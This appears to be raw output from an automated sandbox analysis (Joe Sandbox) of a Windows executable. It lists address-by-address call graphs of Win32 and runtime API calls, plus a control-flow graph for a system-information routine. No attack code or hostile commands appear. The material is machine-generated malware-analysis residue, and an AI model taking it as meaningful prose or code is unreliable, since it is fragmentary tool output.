97825->97827 97828 6f3788 97825->97828 97829 6f3738 97826->97829 97830 6f3804 PostQuitMessage 97826->97830 97832 733df4 97827->97832 97833 6f3790 97827->97833 97831 6f376f DefWindowProcW 97828->97831 97834 733e61 97829->97834 97835 6f3743 97829->97835 97837 6f3709 97830->97837 97831->97837 97879 6f2f92 10 API calls 97832->97879 97838 6f37bc SetTimer RegisterWindowMessageW 97833->97838 97839 6f3797 97833->97839 97882 75c8f7 65 API calls ___scrt_fastfail 97834->97882 97840 6f380e 97835->97840 97841 6f374d 97835->97841 97838->97837 97842 6f37e5 CreatePopupMenu 97838->97842 97845 733d95 97839->97845 97846 6f37a0 KillTimer 97839->97846 97869 70fcad 97840->97869 97848 733e46 97841->97848 97849 6f3758 97841->97849 97842->97837 97844 733e15 97880 70f23c 40 API calls 97844->97880 97853 733dd0 MoveWindow 97845->97853 97854 733d9a 97845->97854 97847 6f3907 Shell_NotifyIconW 97846->97847 97855 6f37b3 97847->97855 97848->97831 97881 751423 8 API calls 97848->97881 97856 6f3763 97849->97856 97857 6f37f2 97849->97857 97850 733e73 97850->97831 97850->97837 97853->97837 97858 733da0 97854->97858 97859 733dbf SetFocus 97854->97859 97876 6f59ff DeleteObject DestroyWindow 97855->97876 97856->97831 97866 6f3907 Shell_NotifyIconW 97856->97866 97877 6f381f 75 API calls ___scrt_fastfail 97857->97877 97858->97856 97860 733da9 97858->97860 97859->97837 97878 6f2f92 10 API calls 97860->97878 97865 6f3802 97865->97837 97867 733e3a 97866->97867 97868 6f396b 60 API calls 97867->97868 97868->97828 97870 70fcc5 ___scrt_fastfail 97869->97870 97871 70fd4b 97869->97871 97872 6f61a9 55 API calls 97870->97872 97871->97837 97873 70fcec 97872->97873 97874 70fd34 KillTimer SetTimer 97873->97874 97875 74fe2b Shell_NotifyIconW 97873->97875 97874->97871 97875->97874 97876->97837 97877->97865 97878->97837 97879->97844 97880->97856 97881->97828 97882->97850 97883 71076b 97884 710777 BuildCatchObjectHelperInternal 97883->97884 97913 710221 97884->97913 97886 71077e 97887 7108d1 97886->97887 97890 7107a8 97886->97890 97951 710baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97887->97951 97889 7108d8 97952 7151c2 28 API calls _abort 97889->97952 97899 7107e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97890->97899 97924 7227ed 97890->97924 97892 7108de 97953 715174 28 API calls _abort 97892->97953 97896 7108e6 97897 7107c7 97903 710848 97899->97903 97947 71518a 38 API calls 3 library calls 97899->97947 97901 71084e 97936 6f331b 97901->97936 97932 710cc9 97903->97932 97907 71086a 97907->97889 97908 71086e 97907->97908 97909 710877 97908->97909 97949 715165 28 API calls _abort 97908->97949 97950 7103b0 13 API calls 2 library calls 97909->97950 97912 71087f 97912->97897 97914 71022a 97913->97914 97954 710a08 IsProcessorFeaturePresent 97914->97954 97916 710236 97955 713004 10 API calls 3 library calls 97916->97955 97918 71023b 97919 71023f 97918->97919 97956 722687 97918->97956 97919->97886 97922 710256 97922->97886 97927 722804 97924->97927 97925 710dfc _ValidateLocalCookies 5 API calls 97926 7107c1 97925->97926 97926->97897 97928 722791 97926->97928 97927->97925 97929 7227c0 97928->97929 97930 710dfc _ValidateLocalCookies 5 API calls 97929->97930 97931 7227e9 97930->97931 97931->97899 98007 7126b0 97932->98007 97934 710cdc GetStartupInfoW 97935 710cef 97934->97935 97935->97901 97937 6f3327 IsThemeActive 97936->97937 97938 6f3382 97936->97938 98009 7152b3 97937->98009 97948 710d02 GetModuleHandleW 97938->97948 97940 6f3352 98015 715319 97940->98015 97942 6f3359 98022 6f32e6 SystemParametersInfoW SystemParametersInfoW 97942->98022 97944 6f3360 98023 6f338b 97944->98023 97946 6f3368 SystemParametersInfoW 97946->97938 97947->97903 97948->97907 97949->97909 97950->97912 97951->97889 97952->97892 97953->97896 97954->97916 97955->97918 97960 72d576 97956->97960 97959 71302d 8 API calls 3 library calls 97959->97919 97961 72d593 97960->97961 97964 72d58f 97960->97964 97961->97964 97966 724f6e 97961->97966 97963 710248 97963->97922 97963->97959 97978 710dfc 97964->97978 97967 724f7a BuildCatchObjectHelperInternal 97966->97967 97985 7232d1 EnterCriticalSection 97967->97985 97969 724f81 97986 725422 97969->97986 97971 724f90 97977 724f9f 97971->97977 97999 724e02 29 API calls 97971->97999 97974 724f9a 98000 724eb8 GetStdHandle GetFileType 97974->98000 97975 724fb0 __fread_nolock 97975->97961 98001 724fbb LeaveCriticalSection _abort 97977->98001 97979 710e05 97978->97979 97980 710e07 IsProcessorFeaturePresent 97978->97980 97979->97963 97982 710fce 97980->97982 98006 710f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97982->98006 97984 7110b1 97984->97963 97985->97969 97987 72542e BuildCatchObjectHelperInternal 97986->97987 97988 725452 97987->97988 97989 72543b 97987->97989 98002 7232d1 EnterCriticalSection 97988->98002 98003 71f649 20 API calls __dosmaperr 97989->98003 97992 725440 98004 722b5c 26 API calls pre_c_initialization 97992->98004 97994 72544a __fread_nolock 97994->97971 97995 72548a 98005 7254b1 LeaveCriticalSection _abort 97995->98005 97997 72545e 97997->97995 97998 725373 __wsopen_s 21 API calls 97997->97998 97998->97997 97999->97974 98000->97977 98001->97975 98002->97997 98003->97992 98004->97994 98005->97994 98006->97984 98008 7126c7 98007->98008 98008->97934 98008->98008 98010 7152bf BuildCatchObjectHelperInternal 98009->98010 98072 7232d1 EnterCriticalSection 98010->98072 98012 7152ca pre_c_initialization 98073 71530a 98012->98073 98014 7152ff __fread_nolock 98014->97940 98016 715325 98015->98016 98017 71533f 98015->98017 98016->98017 98077 71f649 20 API calls __dosmaperr 98016->98077 98017->97942 98019 71532f 98078 722b5c 26 API calls pre_c_initialization 98019->98078 98021 71533a 98021->97942 98022->97944 98024 6f339b __wsopen_s 98023->98024 98025 6fbf73 8 API calls 98024->98025 98026 6f33a7 GetCurrentDirectoryW 98025->98026 98079 6f4fd9 98026->98079 98028 6f33ce IsDebuggerPresent 98029 733ca3 MessageBoxA 98028->98029 98030 6f33dc 98028->98030 98031 733cbb 98029->98031 98030->98031 98032 6f33f0 98030->98032 98183 6f4176 8 API calls 98031->98183 98147 6f3a95 98032->98147 98040 6f3462 98041 733cec SetCurrentDirectoryW 98040->98041 98042 6f346a 98040->98042 98041->98042 98043 6f3475 98042->98043 98184 751fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 98042->98184 98179 6f34d3 7 API calls 98043->98179 98046 733d07 98046->98043 98049 733d19 98046->98049 98051 6f5594 10 API calls 98049->98051 98050 6f347f 98053 6f396b 60 API calls 98050->98053 98054 6f3494 98050->98054 98052 733d22 98051->98052 98055 6fb329 8 API calls 98052->98055 98053->98054 98057 6f34af 98054->98057 98060 6f3907 Shell_NotifyIconW 98054->98060 98056 733d30 98055->98056 98058 733d38 98056->98058 98059 733d5f 98056->98059 98061 6f34b6 SetCurrentDirectoryW 98057->98061 98063 6f6b7c 8 API calls 98058->98063 98062 6f6b7c 8 API calls 98059->98062 98060->98057 98064 6f34ca 98061->98064 98065 733d5b GetForegroundWindow ShellExecuteW 98062->98065 98066 733d43 98063->98066 98064->97946 98069 733d90 98065->98069 98068 6f7bb5 8 API calls 98066->98068 98070 733d51 98068->98070 98069->98057 98071 6f6b7c 8 API calls 98070->98071 98071->98065 98072->98012 98076 723319 LeaveCriticalSection 98073->98076 98075 715311 98075->98014 98076->98075 98077->98019 98078->98021 98080 6fbf73 8 API calls 98079->98080 98081 6f4fef 98080->98081 98185 6f63d7 98081->98185 98083 6f500d 98084 6fbd57 8 API calls 98083->98084 98085 6f5021 98084->98085 98086 6fbed9 8 API calls 98085->98086 98087 6f502c 98086->98087 98199 6f893c 98087->98199 98090 6fb329 8 API calls 98091 6f5045 98090->98091 98092 6fbe2d 39 API calls 98091->98092 98093 6f5055 98092->98093 98094 6fb329 8 API calls 98093->98094 98095 6f507b 98094->98095 98096 6fbe2d 39 API calls 98095->98096 98097 6f508a 98096->98097 98098 6fbf73 8 API calls 98097->98098 98099 6f50a8 98098->98099 98202 6f51ca 98099->98202 98102 714d98 40 API calls 98103 6f50c2 98102->98103 98104 734b23 98103->98104 98105 6f50cc 98103->98105 98107 6f51ca 8 API calls 98104->98107 98106 714d98 40 API calls 98105->98106 98108 6f50d7 98106->98108 98109 734b37 98107->98109 98108->98109 98110 6f50e1 98108->98110 98112 6f51ca 8 API calls 98109->98112 98111 714d98 40 API calls 98110->98111 98113 6f50ec 98111->98113 98114 734b53 98112->98114 98113->98114 98115 6f50f6 98113->98115 98116 6f5594 10 API calls 98114->98116 98117 714d98 40 API calls 98115->98117 98118 734b76 98116->98118 98119 6f5101 98117->98119 98120 6f51ca 8 API calls 98118->98120 98121 734b9f 98119->98121 98122 6f510b 98119->98122 98123 734b82 98120->98123 98125 6f51ca 8 API calls 98121->98125 98124 6f512e 98122->98124 98127 6fbed9 8 API calls 98122->98127 98126 6fbed9 8 API calls 98123->98126 98129 734bda 98124->98129 98130 6f7e12 8 API calls 98124->98130 98128 734bbd 98125->98128 98131 734b90 98126->98131 98132 6f5121 98127->98132 98133 6fbed9 8 API calls 98128->98133 98134 6f513e 98130->98134 98135 6f51ca 8 API calls 98131->98135 98136 6f51ca 8 API calls 98132->98136 98137 734bcb 98133->98137 98138 6f8470 8 API calls 98134->98138 98135->98121 98136->98124 98139 6f51ca 8 API calls 98137->98139 98140 6f514c 98138->98140 98139->98129 98208 6f8a60 98140->98208 98142 6f893c 8 API calls 98144 6f5167 98142->98144 98143 6f8a60 8 API calls 98143->98144 98144->98142 98144->98143 98145 6f51ab 98144->98145 98146 6f51ca 8 API calls 98144->98146 98145->98028 98146->98144 98148 6f3aa2 __wsopen_s 98147->98148 98149 6f3abb 98148->98149 98150 7340da ___scrt_fastfail 98148->98150 98151 6f5851 9 API calls 98149->98151 98153 7340f6 GetOpenFileNameW 98150->98153 98152 6f3ac4 98151->98152 98221 6f3a57 98152->98221 98155 734145 98153->98155 98157 6f8577 8 API calls 98155->98157 98159 73415a 98157->98159 98159->98159 98160 6f3ad9 98239 6f62d5 98160->98239 98784 6f3624 7 API calls 98179->98784 98181 6f347a 98182 6f35b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98181->98182 98182->98050 98183->98040 98184->98046 98186 6f63e4 __wsopen_s 98185->98186 98187 6f8577 8 API calls 98186->98187 98188 6f6416 98186->98188 98187->98188 98189 6f655e 8 API calls 98188->98189 98191 6f644c 98188->98191 98189->98188 98190 6f651a 98192 6f654f 98190->98192 98193 6fb329 8 API calls 98190->98193 98191->98190 98194 6fb329 8 API calls 98191->98194 98197 6f655e 8 API calls 98191->98197 98198 6f6a7c 8 API calls 98191->98198 98192->98083 98195 6f6543 98193->98195 98194->98191 98196 6f6a7c 8 API calls 98195->98196 98196->98192 98197->98191 98198->98191 98200 71014b 8 API calls 98199->98200 98201 6f5038 98200->98201 98201->98090 98203 6f51d4 98202->98203 98204 6f51f2 98202->98204 98205 6f50b4 98203->98205 98207 6fbed9 8 API calls 98203->98207 98206 6f8577 8 API calls 98204->98206 98205->98102 98206->98205 98207->98205 98209 6f8a76 98208->98209 98210 736737 98209->98210 98215 6f8a80 98209->98215 98219 70b7a2 8 API calls 98210->98219 98211 736744 98220 6fb4c8 8 API calls 98211->98220 98214 736762 98214->98214 98215->98211 98216 6f8b94 98215->98216 98218 6f8b9b 98215->98218 98217 71014b 8 API calls 98216->98217 98217->98218 98218->98144 98219->98211 98220->98214 98222 7322d0 __wsopen_s 98221->98222 98223 6f3a64 GetLongPathNameW 98222->98223 98224 6f8577 8 API calls 98223->98224 98225 6f3a8c 98224->98225 98226 6f53f2 98225->98226 98227 6fbf73 8 API calls 98226->98227 98228 6f5404 98227->98228 98229 6f5851 9 API calls 98228->98229 98230 6f540f 98229->98230 98231 6f541a 98230->98231 98237 734d5b 98230->98237 98232 6f6a7c 8 API calls 98231->98232 98234 6f5426 98232->98234 98269 6f1340 98234->98269 98236 734d7d 98237->98236 98275 70e36b 41 API calls 98237->98275 98238 6f5439 98238->98160 98276 6f6679 98239->98276 98242 735336 98401 7636b8 98242->98401 98244 6f6679 93 API calls 98246 6f630e 98244->98246 98246->98242 98249 6f6316 98246->98249 98248 735368 98251 71017b 8 API calls 98248->98251 98252 735353 98249->98252 98253 6f6322 98249->98253 98452 75e30e 82 API calls 98252->98452 98298 6f3b39 98253->98298 98257 735361 98257->98248 98270 6f1352 98269->98270 98274 6f1371 __fread_nolock 98269->98274 98273 71017b 8 API calls 98270->98273 98271 71014b 8 API calls 98272 6f1388 98271->98272 98272->98238 98273->98274 98274->98271 98275->98237 98455 6f663e LoadLibraryA 98276->98455 98281 735648 98283 6f66e7 68 API calls 98281->98283 98282 6f66a4 LoadLibraryExW 98463 6f6607 LoadLibraryA 98282->98463 98285 73564f 98283->98285 98287 6f6607 3 API calls 98285->98287 98289 735657 98287->98289 98484 6f684a 98289->98484 98290 6f66ce 98290->98289 98291 6f66da 98290->98291 98293 6f66e7 68 API calls 98291->98293 98295 6f62fa 98293->98295 98295->98242 98295->98244 98297 73567e 98299 73415f 98298->98299 98300 6f3b62 98298->98300 98664 75a215 81 API calls __wsopen_s 98299->98664 98302 71017b 8 API calls 98300->98302 98308 6f3bec 98402 7636d4 98401->98402 98403 6f6874 64 API calls 98402->98403 98404 7636e8 98403->98404 98682 763827 98404->98682 98452->98257 98456 6f6656 GetProcAddress 98455->98456 98457 6f6674 98455->98457 98458 6f6666 98456->98458 98460 71e95b 98457->98460 98458->98457 98459 6f666d FreeLibrary 98458->98459 98459->98457 98492 71e89a 98460->98492 98462 6f6698 98462->98281 98462->98282 98464 6f661c GetProcAddress 98463->98464 98465 6f663b 98463->98465 98466 6f662c 98464->98466 98468 6f6720 98465->98468 98466->98465 98467 6f6634 FreeLibrary 98466->98467 98467->98465 98469 71017b 8 API calls 98468->98469 98470 6f6735 98469->98470 98471 6f423c 8 API calls 98470->98471 98473 6f6741 __fread_nolock 98471->98473 98472 7356c2 98550 763a92 74 API calls 98472->98550 98473->98472 98477 6f677c 98473->98477 98549 763a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 98473->98549 98476 6f684a 40 API calls 98476->98477 98477->98476 98478 735706 98477->98478 98479 6f6874 64 API calls 98477->98479 98481 6f6810 ISource 98477->98481 98544 6f6874 98478->98544 98479->98477 98481->98290 98483 6f684a 40 API calls 98483->98481 98485 735760 98484->98485 98486 6f685c 98484->98486 98582 71ec34 98486->98582 98489 7632bd 98619 76310d 98489->98619 98491 7632d8 98491->98297 98493 71e8a6 BuildCatchObjectHelperInternal 98492->98493 98494 71e8b4 98493->98494 98496 71e8e4 98493->98496 98517 71f649 20 API calls __dosmaperr 98494->98517 98498 71e8f6 98496->98498 98499 71e8e9 98496->98499 98497 71e8b9 98518 722b5c 26 API calls pre_c_initialization 98497->98518 98509 7283e1 98498->98509 98519 71f649 20 API calls __dosmaperr 98499->98519 98503 71e8ff 98504 71e912 98503->98504 98505 71e905 98503->98505 98521 71e944 LeaveCriticalSection __fread_nolock 98504->98521 98520 71f649 20 API calls __dosmaperr 98505->98520 98506 71e8c4 __fread_nolock 98506->98462 98510 7283ed BuildCatchObjectHelperInternal 98509->98510 98522 7232d1 EnterCriticalSection 98510->98522 98512 7283fb 98523 72847b 98512->98523 98516 72842c __fread_nolock 98516->98503 98517->98497 98518->98506 98519->98506 98520->98506 98521->98506 98522->98512 98524 72849e 98523->98524 98525 7284f7 98524->98525 98532 728408 98524->98532 98539 7194fd EnterCriticalSection 98524->98539 98540 719511 LeaveCriticalSection 98524->98540 98526 724ff0 __dosmaperr 20 API calls 98525->98526 98527 728500 98526->98527 98529 722d38 _free 20 API calls 98527->98529 98530 728509 98529->98530 98530->98532 98541 723778 11 API calls 2 library calls 98530->98541 98536 728437 98532->98536 98533 728528 98542 7194fd EnterCriticalSection 98533->98542 98543 723319 LeaveCriticalSection 98536->98543 98538 72843e 98538->98516 98539->98524 98540->98524 98541->98533 98542->98532 98543->98538 98545 6f6883 98544->98545 98548 735780 98544->98548 98551 71f053 98545->98551 98549->98472 98550->98477 98554 71ee1a 98551->98554 98553 6f6891 98553->98483 98558 71ee26 BuildCatchObjectHelperInternal 98554->98558 98555 71ee32 98579 71f649 20 API calls __dosmaperr 98555->98579 98557 71ee58 98567 7194fd EnterCriticalSection 98557->98567 98558->98555 98558->98557 98560 71ee37 98580 722b5c 26 API calls pre_c_initialization 98560->98580 98561 71ee64 98568 71ef7a 98561->98568 98565 71ee42 __fread_nolock 98565->98553 98567->98561 98569 71ef9c 98568->98569 98570 71ef8c 98568->98570 98572 71eea1 28 API calls 98569->98572 98571 71f649 __dosmaperr 20 API calls 98570->98571 98573 71ef91 98571->98573 98579->98560 98580->98565 98585 71ec51 98582->98585 98584 6f686d 98584->98489 98586 71ec5d BuildCatchObjectHelperInternal 98585->98586 98587 71ec70 ___scrt_fastfail 98586->98587 98588 71ec9d 98586->98588 98589 71ec95 __fread_nolock 98586->98589 98612 71f649 20 API calls __dosmaperr 98587->98612 98598 7194fd EnterCriticalSection 98588->98598 98589->98584 98592 71eca7 98599 71ea68 98592->98599 98593 71ec8a 98613 722b5c 26 API calls pre_c_initialization 98593->98613 98598->98592 98601 71ea7a ___scrt_fastfail 98599->98601 98605 71ea97 98599->98605 98600 71ea87 98615 71f649 20 API calls __dosmaperr 98600->98615 98601->98600 98601->98605 98607 71eada __fread_nolock 98601->98607 98603 71ea8c 98616 722b5c 26 API calls pre_c_initialization 98603->98616 98614 71ecdc LeaveCriticalSection __fread_nolock 98605->98614 98606 71ebf6 ___scrt_fastfail 98618 71f649 20 API calls __dosmaperr 98606->98618 98607->98605 98607->98606 98609 71dcc5 __fread_nolock 26 API calls 98607->98609 98611 7290c5 __fread_nolock 38 API calls 98607->98611 98617 71d2e8 26 API calls 4 library calls 98607->98617 98609->98607 98611->98607 98612->98593 98613->98589 98614->98589 98615->98603 98616->98605 98617->98607 98618->98603 98622 71e858 98619->98622 98621 76311c 98621->98491 98625 71e7d9 98622->98625 98624 71e875 98624->98621 98626 71e7e8 98625->98626 98627 71e7fc 98625->98627 98633 71f649 20 API calls __dosmaperr 98626->98633 98632 71e7f8 __alldvrm 98627->98632 98635 7236b2 11 API calls 2 library calls 98627->98635 98629 71e7ed 98634 722b5c 26 API calls pre_c_initialization 98629->98634 98632->98624 98633->98629 98634->98632 98635->98632 98664->98308 98685 76383b 98682->98685 98784->98181 98785 6f1033 98790 6f68b4 98785->98790 98789 6f1042 98791 6fbf73 8 API calls 98790->98791 98792 6f6922 98791->98792 98799 6f589f 98792->98799 98794 7357bd 98796 6f69bf 98796->98794 98797 6f1038 98796->98797 98802 6f6b14 8 API calls __fread_nolock 98796->98802 98798 710413 29 API calls __onexit 98797->98798 98798->98789 98803 6f58cb 98799->98803 98802->98796 98804 6f58be 98803->98804 98805 6f58d8 98803->98805 98804->98796 98805->98804 98806 6f58df RegOpenKeyExW 98805->98806 98806->98804 98807 6f58f9 RegQueryValueExW 98806->98807 98808 6f592f RegCloseKey 98807->98808 98809 6f591a 98807->98809 98808->98804 98809->98808 98810 743c0a 98831 75c819 98810->98831 98812 743c14 98814 75c819 Sleep 98812->98814 98815 743c3f 98812->98815 98821 6fefdb 98812->98821 98837 70aa65 9 API calls 98812->98837 98814->98812 98816 6fb329 8 API calls 98815->98816 98817 743c6f 98816->98817 98818 6fbfa5 39 API calls 98817->98818 98819 743c8b 98818->98819 98838 76446f 8 API calls 98819->98838 98824 6ff450 98821->98824 98823 6ff097 98825 6ff46f 98824->98825 98826 6ff483 98824->98826 98839 6fe960 98825->98839 98871 763fe1 81 API calls __wsopen_s 98826->98871 98828 6ff47a 98828->98823 98830 744584 98830->98830 98832 75c824 98831->98832 98833 75c83f 98831->98833 98832->98812 98834 75c86d 98833->98834 98835 75c851 Sleep 98833->98835 98834->98812 98835->98834 98837->98812 98838->98823 98840 700340 207 API calls 98839->98840 98857 6fe99d 98840->98857 98841 7431d3 98885 763fe1 81 API calls __wsopen_s 98841->98885 98843 6fea0b ISource 98843->98828 98844 6feac3 98846 6feace 98844->98846 98847 6fedd5 98844->98847 98845 6fecff 98850 7431c4 98845->98850 98851 6fed14 98845->98851 98849 71014b 8 API calls 98846->98849 98847->98843 98854 71017b 8 API calls 98847->98854 98848 6febb8 98855 71017b 8 API calls 98848->98855 98859 6fead5 __fread_nolock 98849->98859 98884 776162 8 API calls 98850->98884 98853 71014b 8 API calls 98851->98853 98863 6feb6a 98853->98863 98854->98859 98866 6feb29 ISource __fread_nolock 98855->98866 98856 71014b 8 API calls 98858 6feaf6 98856->98858 98857->98841 98857->98843 98857->98844 98857->98847 98857->98848 98860 71014b 8 API calls 98857->98860 98857->98866 98858->98866 98872 6fd260 98858->98872 98859->98856 98859->98858 98860->98857 98862 7431b3 98883 763fe1 81 API calls __wsopen_s 98862->98883 98863->98828 98866->98845 98866->98862 98866->98863 98867 74318e 98866->98867 98869 74316c 98866->98869 98880 6f44fe 207 API calls 98866->98880 98882 763fe1 81 API calls __wsopen_s 98867->98882 98881 763fe1 81 API calls __wsopen_s 98869->98881 98871->98830 98873 6fd29a 98872->98873 98874 6fd2c6 98872->98874 98886 6ff6d0 98873->98886 98876 700340 207 API calls 98874->98876 98877 74184b 98876->98877 98878 6fd2a0 98877->98878 98909 763fe1 81 API calls __wsopen_s 98877->98909 98878->98866 98880->98866 98881->98863 98882->98863 98883->98863 98884->98841 98885->98843 98887 6ff710 98886->98887 98905 6ff7dc ISource 98887->98905 98911 7105b2 5 API calls __Init_thread_wait 98887->98911 98890 7445d9 98892 6fbf73 8 API calls 98890->98892 98890->98905 98891 6fbf73 8 API calls 98891->98905 98895 7445f3 98892->98895 98893 6fbe2d 39 API calls 98893->98905 98912 710413 29 API calls __onexit 98895->98912 98897 7445fd 98913 710568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98897->98913 98901 700340 207 API calls 98901->98905 98902 6fbed9 8 API calls 98902->98905 98903 701ca0 8 API calls 98903->98905 98904 763fe1 81 API calls 98904->98905 98905->98891 98905->98893 98905->98901 98905->98902 98905->98903 98905->98904 98906 6ffae1 98905->98906 98910 70b35c 207 API calls 98905->98910 98914 7105b2 5 API calls __Init_thread_wait 98905->98914 98915 710413 29 API calls __onexit 98905->98915 98916 710568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98905->98916 98917 775231 101 API calls 98905->98917 98918 77731e 207 API calls 98905->98918 98906->98878 98909->98878 98910->98905 98911->98890 98912->98897 98913->98905 98914->98905 98915->98905 98916->98905 98917->98905 98918->98905 98919 71f06e 98920 71f07a BuildCatchObjectHelperInternal 98919->98920 98921 71f086 98920->98921 98922 71f09b 98920->98922 98938 71f649 20 API calls __dosmaperr 98921->98938 98932 7194fd EnterCriticalSection 98922->98932 98925 71f08b 98939 722b5c 26 API calls pre_c_initialization 98925->98939 98926 71f0a7 98933 71f0db 98926->98933 98931 71f096 __fread_nolock 98932->98926 98941 71f106 98933->98941 98935 71f0e8 98937 71f0b4 98935->98937 98961 71f649 20 API calls __dosmaperr 98935->98961 98940 71f0d1 LeaveCriticalSection __fread_nolock 98937->98940 98938->98925 98939->98931 98940->98931 98942 71f114 98941->98942 98943 71f12e 98941->98943 98965 71f649 20 API calls __dosmaperr 98942->98965 98944 71dcc5 __fread_nolock 26 API calls 98943->98944 98946 71f137 98944->98946 98962 729789 98946->98962 98947 71f119 98966 722b5c 26 API calls pre_c_initialization 98947->98966 98951 71f23b 98953 71f248 98951->98953 98956 71f1ee 98951->98956 98952 71f1bf 98955 71f1dc 98952->98955 98952->98956 98968 71f649 20 API calls __dosmaperr 98953->98968 98967 71f41f 31 API calls 4 library calls 98955->98967 98958 71f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 98956->98958 98969 71f29b 30 API calls 2 library calls 98956->98969 98958->98935 98959 71f1e6 98959->98958 98961->98937 98970 729606 98962->98970 98964 71f153 98964->98951 98964->98952 98964->98958 98965->98947 98966->98958 98967->98959 98968->98958 98969->98958 98971 729612 BuildCatchObjectHelperInternal 98970->98971 98972 729632 98971->98972 98973 72961a 98971->98973 98975 7296e6 98972->98975 98980 72966a 98972->98980 98996 71f636 20 API calls __dosmaperr 98973->98996 99001 71f636 20 API calls __dosmaperr 98975->99001 98976 72961f 98997 71f649 20 API calls __dosmaperr 98976->98997 98979 7296eb 99002 71f649 20 API calls __dosmaperr 98979->99002 98995 7254ba EnterCriticalSection 98980->98995 98981 729627 __fread_nolock 98981->98964 98984 7296f3 99003 722b5c 26 API calls pre_c_initialization 98984->99003 98985 729670 98987 729694 98985->98987 98988 7296a9 98985->98988 98998 71f649 20 API calls __dosmaperr 98987->98998 98989 72970b __wsopen_s 28 API calls 98988->98989 98994 7296a4 98989->98994 98991 729699 98999 71f636 20 API calls __dosmaperr 98991->98999 99000 7296de LeaveCriticalSection __wsopen_s 98994->99000 98995->98985 98996->98976 98997->98981 98998->98991 98999->98994 99000->98981 99001->98979 99002->98984 99003->98981

                                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                                              Function 006F5FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236libraryloaderCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 224 6f5fc8-6f6037 call 6fbf73 GetVersionExW call 6f8577 229 6f603d 224->229 230 73507d-735090 224->230 232 6f603f-6f6041 229->232 231 735091-735095 230->231 233 735097 231->233 234 735098-7350a4 231->234 235 6f6047-6f60a6 call 6fadf4 call 6f55dc 232->235 236 7350bc 232->236 233->234 234->231 237 7350a6-7350a8 234->237 249 6f60ac-6f60ae 235->249 250 735224-73522b 235->250 240 7350c3-7350cf 236->240 237->232 239 7350ae-7350b5 237->239 239->230 242 7350b7 239->242 243 6f611c-6f6136 GetCurrentProcess IsWow64Process 240->243 242->236 245 6f6138 243->245 246 6f6195-6f619b 243->246 248 6f613e-6f614a 245->248 246->248 253 735269-73526d GetSystemInfo 248->253 254 6f6150-6f615f LoadLibraryA 248->254 255 735125-735138 249->255 256 6f60b4-6f60b7 249->256 251 73524b-73524e 250->251 252 73522d 250->252 261 735250-73525f 251->261 262 735239-735241 251->262 260 735233 252->260 263 6f619d-6f61a7 GetSystemInfo 254->263 264 6f6161-6f616f GetProcAddress 254->264 257 735161-735163 255->257 258 73513a-735143 255->258 256->243 259 6f60b9-6f60f5 256->259 268 735165-73517a 257->268 269 735198-73519b 257->269 265 735150-73515c 258->265 266 735145-73514b 258->266 259->243 267 6f60f7-6f60fa 259->267 260->262 261->260 270 735261-735267 261->270 262->251 272 6f6177-6f6179 263->272 264->263 271 6f6171-6f6175 GetNativeSystemInfo 264->271 265->243 266->243 273 7350d4-7350e4 267->273 274 6f6100-6f610a 267->274 275 735187-735193 268->275 276 73517c-735182 268->276 277 7351d6-7351d9 269->277 278 73519d-7351b8 269->278 270->262 271->272 279 6f617b-6f617c FreeLibrary 272->279 280 6f6182-6f6194 272->280 284 7350f7-735101 273->284 285 7350e6-7350f2 273->285 274->240 281 6f6110-6f6116 274->281 275->243 276->243 277->243 286 7351df-735206 277->286 282 7351c5-7351d1 278->282 283 7351ba-7351c0 278->283 279->280 281->243 282->243 283->243 287 735103-73510f 284->287 288 735114-735120 284->288 285->243 289 735213-73521f 286->289 290 735208-73520e 286->290 287->243 288->243 289->243 290->243
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 006F5FF7
                                                                                                                                                                                                                                                                                • Part of subcall function 006F8577: _wcslen.LIBCMT ref: 006F858A
                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,0078DC2C,00000000,?,?), ref: 006F6123
                                                                                                                                                                                                                                                                              • IsWow64Process.KERNEL32(00000000,?,?), ref: 006F612A
                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 006F6155
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 006F6167
                                                                                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 006F6175
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 006F617C
                                                                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?), ref: 006F61A1
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
